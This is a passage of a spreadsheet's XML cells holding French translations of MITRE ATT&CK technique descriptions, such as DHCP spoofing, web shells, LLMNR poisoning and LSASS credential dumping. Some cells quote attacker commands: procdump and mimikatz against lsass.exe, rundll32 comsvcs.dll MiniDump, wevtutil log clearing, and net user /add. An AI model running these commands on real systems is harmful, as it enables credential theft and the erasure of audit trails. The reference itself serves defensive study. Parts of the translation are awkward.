    <t>Les adversaires peuvent rediriger le trafic réseau vers des systèmes appartenant à l’adversaire en usurpant le trafic DHCP (Dynamic Host Configuration Protocol) et en agissant comme un serveur DHCP malveillant sur le réseau victime. En atteignant la position de l’adversaire intermédiaire (AiTM), les adversaires peuvent collecter les communications réseau, y compris les informations d’identification transmises, en particulier celles envoyées via des protocoles non sécurisés et non chiffrés. Cela peut également permettre des comportements ultérieurs tels que [Reniflage de réseau](https://attack.mitre.org/techniques/T1040) ou [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002).
DHCP est basé sur un modèle client-serveur et dispose de deux fonctionnalités : un protocole permettant de fournir des paramètres de configuration réseau d’un serveur DHCP à un client et un mécanisme d’attribution d’adresses réseau aux clients. (Citation : rfc2131) L’interaction serveur-client typique est la suivante : 
1. Le client diffuse un message « DISCOVER ».
2. Le serveur répond par un message « OFFER », qui comprend une adresse réseau disponible. 
3. Le client diffuse un message « REQUEST », qui inclut l’adresse réseau proposée. 
4. Le serveur accuse réception avec un message « ACK » et le client reçoit les paramètres de configuration du réseau.
Les adversaires peuvent se faire passer pour un serveur DHCP malveillant sur le réseau victime, à partir duquel des hôtes légitimes peuvent recevoir des configurations réseau malveillantes. Par exemple, les logiciels malveillants peuvent agir comme un serveur DHCP et fournir des serveurs DNS appartenant à l’adversaire aux ordinateurs victimes. (Référence : new_rogue_DHCP_serv_malware)(Citation : w32.tidserv.g) Grâce à des configurations réseau malveillantes, un adversaire peut atteindre la position AiTM, acheminer le trafic client via des systèmes contrôlés par l’adversaire et collecter des informations à partir du réseau client.
Les clients DHCPv6 peuvent recevoir des informations de configuration réseau sans qu’une adresse IP ne leur soit attribuée en envoyant un message &lt;code&gt;INFORMATION-REQUEST (code 11)&lt;/code&gt; à l’adresse &lt;code&gt;de multidiffusion All_DHCP_Relay_Agents_and_Servers&lt;/code&gt;. (Citation : rfc3315) Les adversaires peuvent utiliser leur serveur DHCP non autorisé pour répondre à ce message de demande avec des configurations réseau malveillantes.
Plutôt que d’établir une position AiTM, les adversaires peuvent également abuser de l’usurpation DHCP pour effectuer une attaque d’épuisement DHCP (c’est-à-dire [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) en générant de nombreux messages DISCOVER de diffusion pour épuiser le pool d’allocation DHCP d’un réseau.
https://attack.mitre.org/techniques/T1557/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent prendre le contrôle de sessions préexistantes avec des services à distance pour se déplacer latéralement dans un environnement. Les utilisateurs peuvent utiliser des informations d’identification valides pour se connecter à un service spécialement conçu pour accepter des connexions à distance, tel que telnet, SSH et RDP. Lorsqu’un utilisateur se connecte à un service, une session est établie qui lui permet de maintenir une interaction continue avec ce service.
Les adversaires peuvent réquisitionner ces sessions pour effectuer des actions sur des systèmes distants. [Détournement de session de service à distance](https://attack.mitre.org/techniques/T1563) diffère de l’utilisation des [Services à distance](https://attack.mitre.org/techniques/T1021) car il détourne une session existante plutôt que de créer une nouvelle session à l’aide de [Comptes valides](https://attack.mitre.org/techniques/T1078). (Citation : Support de détournement RDP)(Citation : Violation Post-mortem SSH Hijack)
https://attack.mitre.org/techniques/T1563</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le remplissage binaire pour ajouter des données indésirables et modifier la représentation sur disque des logiciels malveillants. Cela peut être fait sans affecter la fonctionnalité ou le comportement d’un fichier binaire, mais peut augmenter la taille du fichier binaire au-delà de ce que certains outils de sécurité sont capables de gérer en raison des limitations de taille de fichier. 
Le remplissage binaire modifie efficacement la somme de contrôle du fichier et peut également être utilisé pour éviter les listes de blocage basées sur le hachage et les signatures antivirus statiques. (Citation : ESET OceanLotus) Le remplissage utilisé est généralement généré par une fonction permettant de créer des données indésirables, puis ajouté à la fin ou appliqué à des sections de logiciels malveillants. (Citation : Securelist Malware Tricks avril 2017) L’augmentation de la taille des fichiers peut réduire l’efficacité de certains outils et capacités de détection qui ne sont pas conçus ou configurés pour analyser des fichiers volumineux. Cela peut également réduire la probabilité d’être prélevé à des fins d’analyse. Les services d’analyse de fichiers publics, tels que VirusTotal, limitent la taille maximale d’un fichier téléchargé à analyser. (Citation : FAQ de VirusTotal)
https://attack.mitre.org/techniques/T1027/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent détourner des serveurs Web à l’aide d’interpréteurs Web pour établir un accès persistant aux systèmes. Un Web shell est un script Web qui est placé sur un serveur Web librement accessible pour permettre à un adversaire d’accéder au serveur Web en tant que passerelle vers un réseau. Un Web shell peut fournir un ensemble de fonctions à exécuter ou une interface de ligne de commande sur le système qui héberge le serveur Web. (Référence : volexity_0day_sophos_FW)
En plus d’un script côté serveur, un Web Shell peut avoir un programme d’interface client utilisé pour communiquer avec le serveur Web (par exemple, [China Chopper](https://attack.mitre.org/software/S0020) Web Shell client). (Référence : Lee 2013)
https://attack.mitre.org/techniques/T1505/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les objets de stratégie de groupe (GPO) pour contourner les contrôles d’accès discrétionnaires prévus pour un domaine, généralement dans le but d’élever les privilèges sur le domaine. La stratégie de groupe permet une gestion centralisée des paramètres de l’utilisateur et de l’ordinateur dans Active Directory (AD). Les GPO sont des conteneurs pour les paramètres de stratégie de groupe composés de fichiers stockés dans un chemin réseau prévisible '\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\'.( Citation : Principes de base de la politique de groupe TechNet (Citation : ADSecurity GPO Persistence 2016) 
À l’instar d’autres objets dans AD, les objets de stratégie de groupe sont associés à des contrôles d’accès. Par défaut, tous les comptes d’utilisateur du domaine sont autorisés à lire les objets de stratégie de groupe. Il est possible de déléguer des autorisations de contrôle d’accès GPO, par exemple l’accès en écriture, à des utilisateurs ou à des groupes spécifiques du domaine.
Les modifications malveillantes d’un objet de stratégie de groupe peuvent être utilisées pour implémenter de nombreux autres comportements malveillants tels que [Tâche/Travail planifié](https://attack.mitre.org/techniques/T1053), [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001), [Transfert d’outil d’entrée](https://attack.mitre.org/techniques/T1105), [Créer un compte](https://attack.mitre.org/techniques/T1136), [Exécution de service](https://attack.mitre.org/techniques/T1569/002), etc. (Citation : ADSecurity GPO Persistence 2016)(Citation : Guide Wald0 sur les GPO)(Citation : harmj0y abusant des autorisations GPO)(Citation : Mandiant M Trends 2016)(Citation : Violation de l’équipe de piratage de Microsoft) Étant donné que les GPO peuvent contrôler un grand nombre de paramètres d’utilisateur et de machine dans l’environnement AD, il existe un grand nombre d’attaques potentielles qui peuvent découler de cet abus GPO. (Citation : Guide Wald0 sur les GPO)
Par exemple, les scripts disponibles publiquement, tels que &lt;code&gt;New-GPOImmediateTask&lt;/code&gt;, peuvent être exploités pour automatiser la création d’une [tâche/tâche planifiée](https://attack.mitre.org/techniques/T1053) malveillante en modifiant les paramètres GPO, dans ce cas en modifiant &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml&lt;/code&gt;. (Citation : Guide Wald0 sur les GPO)(Citation : harmj0y abusant des autorisations GPO) Dans certains cas, un adversaire peut modifier des droits d’utilisateur spécifiques tels que SeEnableDelegationPrivilege, définis dans &lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf&lt;/code&gt;, pour obtenir une porte dérobée AD subtile avec un contrôle total du domaine, car le compte d’utilisateur sous le contrôle de l’adversaire serait alors en mesure de modifier les GPO. (citation : Harmj0y SeEnableDelegationPrivilege Right)
https://attack.mitre.org/techniques/T1484/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent énumérer des informations sur les navigateurs pour en savoir plus sur les environnements compromis. Les données enregistrées par les navigateurs (telles que les signets, les comptes et l’historique de navigation) peuvent révéler diverses informations personnelles sur les utilisateurs (par exemple, les sites bancaires, les relations/intérêts, les médias sociaux, etc.) ainsi que des détails sur les ressources du réseau interne telles que les serveurs, les outils/tableaux de bord ou d’autres infrastructures connexes. (Citation : Kaspersky Autofill)
Les informations du navigateur peuvent également mettre en évidence d’autres cibles après qu’un adversaire a accès à des informations d’identification valides, en particulier [Informations d’identification dans les fichiers](https://attack.mitre.org/techniques/T1552/001) associées aux connexions mises en cache par un navigateur.
Les emplacements de stockage spécifiques varient en fonction de la plate-forme et/ou de l’application, mais les informations du navigateur sont généralement stockées dans des fichiers et des bases de données locaux (par exemple, ' %APPDATA %/Google/Chrome'). (Citation : Profils d’itinérance Chrome)
https://attack.mitre.org/techniques/T1217</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des fichiers de certificat de clé privée sur des systèmes compromis pour trouver des informations d’identification stockées de manière non sécurisée. Les clés et certificats cryptographiques privés sont utilisés pour l’authentification, le chiffrement/déchiffrement et les signatures numériques. (Citation : Wikipédia Clé publique Crypto) Les extensions de fichier de clé et de certificat courantes sont les suivantes : .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 
Les adversaires peuvent également rechercher dans des répertoires de clés courants, tels que &lt;code&gt;~/.ssh&lt;/code&gt; pour les clés SSH sur les systèmes basés sur * nix ou &lt;code&gt;C :\Users\(username)\.ssh\&lt;/code&gt; sur Windows. Les outils malveillants peuvent également rechercher dans les systèmes compromis des extensions de fichiers relatives aux clés cryptographiques et aux certificats. (Référence : Kaspersky Careto)(Citation : Palo Alto, prince de Perse)
Lorsqu’un périphérique est enregistré auprès d’Entra ID, une clé de périphérique et une clé de transport sont générées et utilisées pour vérifier l’identité du périphérique. (Citation : Jeton d’actualisation primaire Microsoft) Un adversaire ayant accès à l’appareil peut être en mesure d’exporter les clés afin d’usurper l’identité de l’appareil. (Citation : AADInternals Azure AD Device Identities)
Sur les périphériques réseau, les clés privées peuvent être exportées via des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'crypto pki export'. (Référence : cisco_deploy_rsa_keys) 
Certaines clés privées nécessitent un mot de passe ou une phrase de passe pour fonctionner, de sorte qu’un adversaire peut également utiliser [Capture d’entrée](https://attack.mitre.org/techniques/T1056) pour l’enregistrement de frappe ou tenter de [Force brute](https://attack.mitre.org/techniques/T1110) la phrase de passe hors ligne. Ces clés privées peuvent être utilisées pour s’authentifier auprès des [Services à distance](https://attack.mitre.org/techniques/T1021) comme SSH ou pour déchiffrer d’autres fichiers collectés tels que des e-mails.
https://attack.mitre.org/techniques/T1552/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer, louer ou obtenir des serveurs physiques qui peuvent être utilisés lors du ciblage. L’utilisation de serveurs permet à un adversaire de mettre en scène, de lancer et d’exécuter une opération. Au cours des activités post-compromission, les adversaires peuvent utiliser des serveurs pour diverses tâches, telles que les opérations de point d’eau dans [Compromission intempestive](https://attack.mitre.org/techniques/T1189), l’activation des opérations [Phishing](https://attack.mitre.org/techniques/T1566) ou la facilitation de la [Commande et contrôle](https://attack.mitre.org/tactics/TA0011). Au lieu de compromettre un [serveur](https://attack.mitre.org/techniques/T1584/004) tiers ou de louer un [serveur privé virtuel](https://attack.mitre.org/techniques/T1583/003), les adversaires peuvent choisir de configurer et d’exécuter leurs propres serveurs pour soutenir les opérations. Les périodes d’essai gratuites des serveurs cloud peuvent également être utilisées de manière abusive. (Citation : Essai gratuit PurpleUrchin)(Citation : Freejacked) 
Les adversaires peuvent n’avoir besoin d’une configuration légère que si la plupart de leurs activités se déroulent à l’aide d’une infrastructure en ligne. Ils peuvent également avoir besoin de construire une infrastructure étendue s’ils souhaitent tester, communiquer et contrôler d’autres aspects de leurs activités sur leurs propres systèmes. (Citation : NYTStuxnet)
https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec des systèmes distants à l’aide de Windows Remote Management (WinRM). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
WinRM est le nom d’un service Windows et d’un protocole qui permet à un utilisateur d’interagir avec un système distant (par exemple, exécuter un exécutable, modifier le registre, modifier des services). (Citation : Microsoft WinRM) Il peut être appelé avec la commande 'winrm' ou par n’importe quel nombre de programmes tels que PowerShell. (Citation : Jacobsen 2014) WinRM peut être utilisé comme méthode d’interaction à distance avec [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Référence : MSDN WMI)
https://attack.mitre.org/techniques/T1021/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exfiltrer des données via Bluetooth plutôt que via le canal de commande et de contrôle. Si le réseau de commande et de contrôle est une connexion Internet câblée, un adversaire peut choisir d’exfiltrer des données à l’aide d’un canal de communication Bluetooth.
Les adversaires peuvent choisir de le faire s’ils disposent d’un accès et d’une proximité suffisants. Les connexions Bluetooth peuvent ne pas être sécurisées ou défendues aussi bien que le canal principal connecté à Internet, car il n’est pas acheminé via le même réseau d’entreprise.
https://attack.mitre.org/techniques/T1011/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir et abuser des identifiants d’un compte par défaut comme moyen d’obtenir l’accès initial, la persistance, l’élévation de privilèges ou l’évasion de la défense. Les comptes par défaut sont ceux qui sont intégrés à un système d’exploitation, tels que les comptes Invité ou Administrateur sur les systèmes Windows. Les comptes par défaut incluent également les comptes d’usine/de fournisseur par défaut sur d’autres types de systèmes, de logiciels ou d’appareils, y compris le compte d’utilisateur racine dans AWS et le compte de service par défaut dans Kubernetes. (Citation : Comptes locaux Microsoft février 2019)(citation : utilisateur racine AWS)(Citation : Matrice des menaces pour Kubernetes)
Les comptes par défaut ne sont pas limités aux ordinateurs clients, mais incluent également des comptes prédéfinis pour des équipements tels que des périphériques réseau et des applications informatiques, qu’ils soient internes, open source ou commerciaux. Les appliances prédéfinies avec une combinaison de nom d’utilisateur et de mot de passe constituent une menace sérieuse pour les entreprises qui ne les modifient pas après l’installation, car elles sont des cibles faciles pour un adversaire. De même, les adversaires peuvent également utiliser des [clés privées](https://attack.mitre.org/techniques/T1552/004) ou des documents d’identification divulgués publiquement ou volés pour se connecter légitimement à des environnements distants via des [services à distance](https://attack.mitre.org/techniques/T1021). (Citation : Module SSH Metasploit)
https://attack.mitre.org/techniques/T1078/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fournisseurs de temps pour exécuter des DLL au démarrage du système. Le service de temps Windows (W32Time) permet la synchronisation de l’heure entre les domaines et au sein de ceux-ci. (Citation : Microsoft W32Time février 2018) Les fournisseurs de temps W32Time sont chargés de récupérer les horodatages des ressources matérielles/réseau et de transmettre ces valeurs à d’autres clients du réseau. (Citation : Microsoft TimeProvider)
Les fournisseurs de temps sont implémentés sous forme de bibliothèques de liens dynamiques (DLL) qui sont enregistrées dans les sous-clés de 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\'. (Citation : Microsoft TimeProvider) Le gestionnaire de fournisseurs de temps, dirigé par le gestionnaire de contrôle de service, charge et démarre les fournisseurs de temps répertoriés et activés sous cette clé au démarrage du système et/ou chaque fois que les paramètres sont modifiés. (Citation : Microsoft TimeProvider)
Les adversaires peuvent abuser de cette architecture pour établir la persistance, en particulier en créant une nouvelle sous-clé nommée arbitrairement pointant vers une DLL malveillante dans la valeur « DllName ». Des privilèges d’administrateur sont requis pour l’inscription du fournisseur de temps, mais l’exécution s’exécute dans le contexte du compte du service local. (Citation : github w32time octobre 2017)
https://attack.mitre.org/techniques/T1547/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent établir une persistance en exécutant du contenu malveillant déclenché par un signal d’interruption. La commande &lt;code&gt;trap&lt;/code&gt; permet aux programmes et aux shells de spécifier des commandes qui seront exécutées lors de la réception de signaux d’interruption. Une situation courante est un script permettant de terminer et de gérer en douceur les interruptions de clavier courantes telles que &lt;code&gt;ctrl+c&lt;/code&gt; et &lt;code&gt;ctrl+d&lt;/code&gt;.
Les adversaires peuvent l’utiliser pour enregistrer le code à exécuter lorsque l’interpréteur rencontre des interruptions spécifiques en tant que mécanisme de persistance. Les commandes d’interruption sont de format suivant : &lt;code&gt;piéger les signaux 'liste de commandes'&lt;/code&gt; où la « liste de commandes » sera exécutée lorsque des « signaux » sont reçus. (Citation : Manuel des pièges)(Citation : Cyberciti Trap Statements)
https://attack.mitre.org/techniques/T1546/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les variables d’environnement que l’éditeur de liens dynamiques utilise pour charger des bibliothèques partagées. Au cours de la phase de préparation de l’exécution d’un programme, l’éditeur de liens dynamique charge les chemins absolus spécifiés des bibliothèques partagées à partir de variables et de fichiers d’environnement, tels que &lt;code&gt;LD_PRELOAD&lt;/code&gt; sous Linux ou &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; sous macOS. Les bibliothèques spécifiées dans les variables d’environnement sont chargées en premier, ce qui a la priorité sur les bibliothèques système portant le même nom de fonction. (Citation : Man LD.SO)(Citation : Bibliothèques partagées TLDP)(Citation : Bibliothèques dynamiques d’archives Apple Doco) Ces variables sont souvent utilisées par les développeurs pour déboguer des fichiers binaires sans avoir à recompiler, désamorcer les conflits entre les symboles mappés et implémenter des fonctions personnalisées sans modifier la bibliothèque d’origine. (Référence : Baeldung LD_PRELOAD)
Sous Linux et macOS, le détournement des variables de l’éditeur de liens dynamiques peut accorder l’accès à la mémoire du processus victime, aux ressources système/réseau et éventuellement à des privilèges élevés. Cette méthode peut également échapper à la détection des produits de sécurité puisque l’exécution est masquée par un processus légitime. Les adversaires peuvent définir des variables d’environnement via la ligne de commande à l’aide de la commande &lt;code&gt;export&lt;/code&gt;, de la fonction &lt;code&gt;setenv&lt;/code&gt; ou de la fonction &lt;code&gt;putenv&lt;/code&gt;. Les adversaires peuvent également tirer parti du [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) pour exporter des variables dans un shell ou définir des variables par programmation à l’aide d’une syntaxe de niveau supérieur telle que &lt;code&gt;os.environnement&lt;/code&gt; de Python.
Sous Linux, les adversaires peuvent configurer &lt;code&gt;LD_PRELOAD&lt;/code&gt; pour qu’ils pointent vers des bibliothèques malveillantes qui correspondent au nom de bibliothèques légitimes demandées par un programme victime, ce qui oblige le système d’exploitation à charger le code malveillant de l’adversaire lors de l’exécution du programme victime. &lt;code&gt;LD_PRELOAD&lt;/code&gt; peut être défini via la variable d’environnement ou le fichier &lt;code&gt;/etc/ld.so.preload&lt;/code&gt;. (Citation : Man LD.SO)(Citation : Bibliothèques partagées TLDP) Les bibliothèques spécifiées par &lt;code&gt;LD_PRELOAD&lt;/code&gt; sont chargées et mappées en mémoire par &lt;code&gt;dlopen()&lt;/code&gt; et &lt;code&gt;mmap()&lt;/code&gt; respectivement. (Citation : Injection de code sur Linux et macOS)(Citation : Aiguille non informée) (Citation : Phrack à moitié mort 1997)(Citation : Brown exploitant les linkers) 
Sur macOS, ce comportement est conceptuellement le même que sur Linux, ne différant que par la façon dont les bibliothèques dynamiques macOS (dyld) sont implémentées à un niveau inférieur. Les adversaires peuvent définir la variable &lt;code&gt;d’environnement DYLD_INSERT_LIBRARIES&lt;/code&gt; pour qu’elle pointe vers des bibliothèques malveillantes contenant des noms de bibliothèques légitimes ou des fonctions demandées par un programme victime. (Citation : TheEvilBit DYLD_INSERT_LIBRARIES)(Référence : Timac DYLD_INSERT_LIBRARIES)(Citation : Gabilondo DYLD_INSERT_LIBRARIES contournement de Catalina)
https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer un compte local pour maintenir l’accès aux systèmes des victimes. Les comptes locaux sont ceux configurés par une organisation pour une utilisation par les utilisateurs, le support à distance, les services ou pour l’administration sur un système ou un service unique. 
Par exemple, avec un niveau d’accès suffisant, la commande Windows &lt;code&gt;net user /add&lt;/code&gt; peut être utilisée pour créer un compte local. Sur les systèmes macOS, la commande &lt;code&gt;dscl -create&lt;/code&gt; peut être utilisée pour créer un compte local. Des comptes locaux peuvent également être ajoutés aux périphériques réseau, souvent via des commandes courantes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que le &lt;code&gt;nom d’utilisateur&lt;/code&gt;, ou à des clusters Kubernetes à l’aide de l’utilitaire 'kubectl'. (Référence : cisco_username_cmd)(Citation : Sécurité des comptes de service Kubernetes)
Ces comptes peuvent être utilisés pour établir un accès secondaire authentifié qui ne nécessite pas le déploiement d’outils d’accès à distance persistants sur le système.
https://attack.mitre.org/techniques/T1136/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des commandes et des contrôles entre des hôtes compromis sur des réseaux potentiellement déconnectés à l’aide de supports amovibles pour transférer des commandes d’un système à l’autre. (Citation : ESET Sednit USBStealer 2014) Les deux systèmes devraient être compromis, avec la probabilité qu’un système connecté à Internet ait été compromis en premier et le second par un mouvement latéral par [Réplication via un support amovible](https://attack.mitre.org/techniques/T1091). Les commandes et les fichiers seraient relayés du système déconnecté au système connecté à Internet auquel l’adversaire a un accès direct.
https://attack.mitre.org/techniques/T1092</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer les journaux d’événements Windows pour masquer l’activité d’une intrusion. Les journaux d’événements Windows sont un enregistrement des alertes et des notifications d’un ordinateur. Il existe trois sources d’événements définies par le système : Système, Application et Sécurité, avec cinq types d’événements : Erreur, Avertissement, Information, Audit de réussite et Audit d’échec.
Avec les privilèges d’administrateur, les journaux d’événements peuvent être effacés à l’aide des commandes utilitaires suivantes :
* &lt;code&gt;Système Wevtutil CL&lt;/code&gt;
* &lt;code&gt;Wevtutil CL Application&lt;/code&gt;
* &lt;code&gt;Wevtutil CL Sécurité&lt;/code&gt;
Ces journaux peuvent également être effacés par d’autres mécanismes, tels que l’interface graphique de l’observateur d’événements ou [PowerShell](https://attack.mitre.org/techniques/T1059/001). Par exemple, les adversaires peuvent utiliser la commande PowerShell &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; pour supprimer le Security EventLog et, après le redémarrage, désactiver la journalisation future.  Remarque : des événements peuvent toujours être générés et enregistrés dans le fichier .evtx entre l’exécution de la commande et le redémarrage. (Référence : disable_win_evt_logging)
Les adversaires peuvent également tenter d’effacer les journaux en supprimant directement les fichiers journaux stockés dans 'C :\Windows\System32\winevt\logs\'.
https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des comptes de messagerie qui peuvent être utilisés lors du ciblage. Les adversaires peuvent utiliser des comptes créés auprès de fournisseurs de messagerie pour poursuivre leurs opérations, par exemple en les exploitant pour effectuer des [hameçonnages contre des informations](https://attack.mitre.org/techniques/T1598) ou des [hameçonnages](https://attack.mitre.org/techniques/T1566). (Référence : Mandiant APT1) La création de comptes de messagerie peut également permettre à des adversaires d’abuser de services gratuits, tels que des périodes d’essai, pour [Acquérir une infrastructure](https://attack.mitre.org/techniques/T1583) à des fins de suivi. (Citation : Essai gratuit PurpleUrchin)
Les adversaires peuvent également prendre des mesures pour cultiver un personnage autour du compte de messagerie, par exemple en utilisant des [comptes de médias sociaux](https://attack.mitre.org/techniques/T1585/001), afin d’augmenter les chances de succès des comportements de suivi. Les comptes de messagerie créés peuvent également être utilisés dans l’acquisition d’infrastructures (ex : [Domaines](https://attack.mitre.org/techniques/T1583/001)). (Référence : Mandiant APT1)
Pour réduire le risque de lier physiquement les opérations à eux-mêmes, les adversaires peuvent utiliser des services de messagerie jetables. (Citation : Trend Micro R980 2016)
https://attack.mitre.org/techniques/T1585/002</t>
  </si>
  <si>
    <t>En répondant au trafic réseau LLMNR/NBT-NS, les adversaires peuvent usurper une source faisant autorité pour la résolution de noms afin de forcer la communication avec un système contrôlé par l’adversaire. Cette activité peut être utilisée pour collecter ou relayer des documents d’authentification. 
La résolution de noms de multidiffusion locale (LLMNR) et le service de noms NetBIOS (NBT-NS) sont des composants Microsoft Windows qui servent d’autres méthodes d’identification de l’hôte. LLMNR est basé sur le format DNS (Domain Name System) et permet aux hôtes sur la même liaison locale d’effectuer la résolution de noms pour d’autres hôtes. NBT-NS identifie les systèmes d’un réseau local par leur nom NetBIOS. (Citation : Wikipédia LLMNR)(Citation : TechNet NetBIOS)
Les adversaires peuvent usurper une source faisant autorité pour la résolution de noms sur un réseau victime en répondant au trafic LLMNR (UDP 5355)/NBT-NS (UDP 137) comme s’ils connaissaient l’identité de l’hôte demandé, empoisonnant ainsi le service afin que les victimes communiquent avec le système contrôlé par l’adversaire. Si l’hôte demandé appartient à une ressource qui nécessite une identification/authentification, le nom d’utilisateur et le hachage NTLMv2 seront alors envoyés au système contrôlé par l’adversaire. L’adversaire peut ensuite collecter les informations de hachage envoyées sur le réseau à l’aide d’outils qui surveillent les ports pour le trafic ou via [Network Sniffing](https://attack.mitre.org/techniques/T1040) et craquer les hachages hors ligne via [Brute Force](https://attack.mitre.org/techniques/T1110) pour obtenir les mots de passe en texte brut.
Dans certains cas où un adversaire a accès à un système qui se trouve dans le chemin d’authentification entre les systèmes ou lorsque des analyses automatisées qui utilisent des informations d’identification tentent de s’authentifier auprès d’un système contrôlé par l’adversaire, les hachages NTLMv1/v2 peuvent être interceptés et relayés pour accéder à un système cible et exécuter du code sur celui-ci. Le pas de relais peut se produire en conjonction avec un empoisonnement, mais peut aussi en être indépendant. (Citation : byt3bl33d3r Relais NTLM)(Citation : Secure Ideas SMB Relay) De plus, les adversaires peuvent encapsuler les hachages NTLMv1/v2 dans divers protocoles, tels que LDAP, SMB, MSSQL et HTTP, afin d’étendre et d’utiliser plusieurs services avec la réponse NTLM valide. 
Plusieurs outils peuvent être utilisés pour empoisonner les services de noms au sein des réseaux locaux, tels que NBNSpoof, Metasploit et [Responder](https://attack.mitre.org/software/S0174). (Citation : GitHub NBNSpoof)(Citation : Rapid7 LLMNR Spoofer)(Citation : GitHub Responder)
https://attack.mitre.org/techniques/T1557/001</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</si>
  <si>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Les modifications peuvent inclure la modification de droits d’accès spécifiques, ce qui peut nécessiter la prise en charge d’un fichier ou d’un répertoire et/ou des autorisations élevées en fonction des autorisations existantes du fichier ou du répertoire. Cela peut permettre des activités malveillantes telles que la modification, le remplacement ou la suppression de fichiers ou de répertoires spécifiques. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flux](https://attack.mitre.org/techniques/T1574).
Les adversaires peuvent également modifier les autorisations des liens symboliques. Par exemple, les logiciels malveillants (en particulier les ransomwares) peuvent modifier les liens symboliques et les paramètres associés pour permettre l’accès aux fichiers à partir de raccourcis locaux avec des chemins d’accès distants. (Citation : new_rust_based_ransomware)(Référence : bad_luck_blackcat)(Référence : falconoverwatch_blackcat_attack)(Référence : blackmatter_blackcat)(Référence : fsutil_behavior)
https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder aux informations d’identification stockées dans la mémoire de processus du service LSASS (Local Security Authority Subsystem Service). Une fois qu’un utilisateur s’est connecté, le système génère et stocke divers éléments d’identification dans la mémoire de processus LSASS. Ces éléments d’identification peuvent être collectés par un utilisateur administratif ou un SYSTEM et utilisés pour effectuer [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) à l’aide de [Utiliser un autre matériel d’authentification](https://attack.mitre.org/techniques/T1550).
En plus des techniques en mémoire, la mémoire de processus LSASS peut être vidée de l’hôte cible et analysée sur un système local.
Par exemple, sur l’hôte cible, utilisez procdump :
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Localement, mimikatz peut être exécuté en utilisant :
* &lt;code&gt;sekurlsa ::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa ::logonPasswords&lt;/code&gt;
Des outils Windows intégrés tels que 'comsvcs.dll' peuvent également être utilisés :
* &lt;code&gt;rundll32.exe C :\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full&lt;/code&gt;(Citation : Volexity Exchange Marauder March 2021)(Citation : Symantec Attacks Against Government Sector)
À l’instar de [Injection d’options d’exécution de fichier image](https://attack.mitre.org/techniques/T1546/012), le mécanisme de sortie de processus silencieux peut être utilisé de manière abusive pour créer un vidage de mémoire de 'lsass.exe' via le rapport d’erreurs Windows ('WerFault.exe'). (Citation : Deep Instinct LSASS)
Les DLL SSP (Security Security Support Provider) Windows sont chargées dans le processus LSASS au démarrage du système. Une fois chargées dans le LSA, les DLL SSP ont accès aux mots de passe chiffrés et en texte brut qui sont stockés dans Windows, tels que le mot de passe de domaine ou les codes confidentiels de carte à puce de tout utilisateur connecté. La configuration SSP est stockée dans deux clés de registre : &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; et &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. Un adversaire peut modifier ces clés de registre pour ajouter de nouveaux SSP, qui seront chargés au prochain démarrage du système ou lors de l’appel de la fonction d’API Windows AddSecurityPackage. (Citation : Graeber 2014)
Les SSP suivants peuvent être utilisés pour accéder aux informations d’identification :
* Msv : les ouvertures de session interactives, les ouvertures de session par lots et les ouvertures de session de service sont effectuées via le package d’authentification MSV.
* Wdigest : Le protocole d’authentification Digest est conçu pour être utilisé avec les échanges HTTP (Hypertext Transfer Protocol) et SASL (Simple Authentication Security Layer). (Citation : Protection des informations d’identification des blogs TechNet)
* Kerberos : Recommandé pour l’authentification mutuelle de domaine client-serveur dans Windows 2000 et versions ultérieures.
